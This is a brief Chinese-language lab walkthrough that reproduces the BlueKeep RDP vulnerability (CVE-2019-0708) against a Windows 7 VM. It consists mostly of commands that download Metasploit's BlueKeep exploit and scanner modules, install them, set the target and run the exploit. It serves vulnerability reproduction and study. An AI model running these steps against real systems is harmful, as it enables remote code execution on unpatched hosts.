在vm中开启一台win7 x64 sp1并开启rdp远程服务
将msf更新到最新版本
1
| apt update; apt install metasploit-framework
|
下载更新的rb脚本并添加到msf
1 2 3 4 5 6 7 8
| wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/ cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/ cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/ cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
|
打开msf,将模块重载reload_all
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
设置好rhosts 和target
最后exploit
复现成功